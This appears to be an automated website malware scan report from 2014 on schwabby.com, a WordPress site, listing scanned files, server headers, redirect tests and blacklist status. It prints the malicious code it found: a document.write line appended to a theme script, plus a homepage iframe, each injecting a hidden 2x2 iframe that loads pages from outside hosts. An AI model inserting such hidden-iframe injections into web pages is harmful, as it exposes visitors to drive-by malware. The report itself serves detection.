Scanned pages/files
Request | Server response | Status |
http://www.schwabby.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 09 Sep 2014 06:39:22 GMT Pragma: no-cache Location: http://schwabby.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ca27ed50723a59dc1ccdaf1b10d56925; path=/ X-Pingback: http://schwabby.com/xmlrpc.php | clean |
http://schwabby.com/ | 200 OK Content-Length: 71999 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://gimnasiopontevedra.net/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gimnasiopontevedra.net/hmod.html> | ||
http://schwabby.com/wp-content/themes/smiley_theme_2/script.js | 200 OK Content-Length: 10799 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
cssFix = function(){ var u = navigator.userAgent.toLowerCase(), addClass = function(el, val){ if(! el.className) { el.className = val; } else { var newCl = el.className; newCl+=(' '+val); el.className = newCl; } }, is = function(t){return (u.indexOf(t)!=-1)}; addClass(document.getElementsByTagName('html')[0],[ (!(/opera|webtv/i.test(u))&&/msie (\d)/.test(u))?('ie ie'+RegExp.$1) : is('firefox/2')?'gecko firefox2' : is( wrapper = button.parentNode; if (!artHasClass(button, 'active')) wrapper.className = wrapper.className.replace(/active/, ""); }); } } } artLoadEvent.add(function() { artButtonsSetupJsHover("art-button"); }); artLoadEvent.add(function() { artButtonsSetupJsHover("button"); }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salsagetaways.com/hmod.html></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://salsagetaways.com/hmod.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salsagetaways.com/hmod.html> | ||
http://schwabby.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://schwabby.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js?ver=2.2 | 200 OK Content-Length: 10220 Content-Type: text/javascript | clean |
http://schwabby.com/wp-content/plugins/wp-cart-for-digital-products/lib/eStore_read_form.min.1.js | 200 OK Content-Length: 938 Content-Type: application/javascript | clean |
http://ws.amazon.com/widgets/q?ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/schwabby-20/8001/914a2c34-fdc8-4fdc-a3de-03ad26a0114c | 200 OK Content-Length: 3573 Content-Type: application/javascript | clean |
http://schwabby.com/wp-content/plugins/wp-cart-for-digital-products/lib/jquery.lightbox-0.5.min.js | 200 OK Content-Length: 10036 Content-Type: application/javascript | clean |
http://www.schwabby.com/flash/ | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://www.schwabby.com/test404page.js | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
http://www.schwabby.com/flash | 404 Not Found Content-Length: 2693 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: schwabby.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 09 Sep 2014 06:39:24 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=35449e95e8cadabf9a4ff4e96f049462; path=/
X-Pingback: http://schwabby.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: schwabby.com
Referer: http://www.google.com/search?q=schwabby.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=schwabby.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://schwabby.com/
Result: schwabby.com is not infected or malware details are not published yet.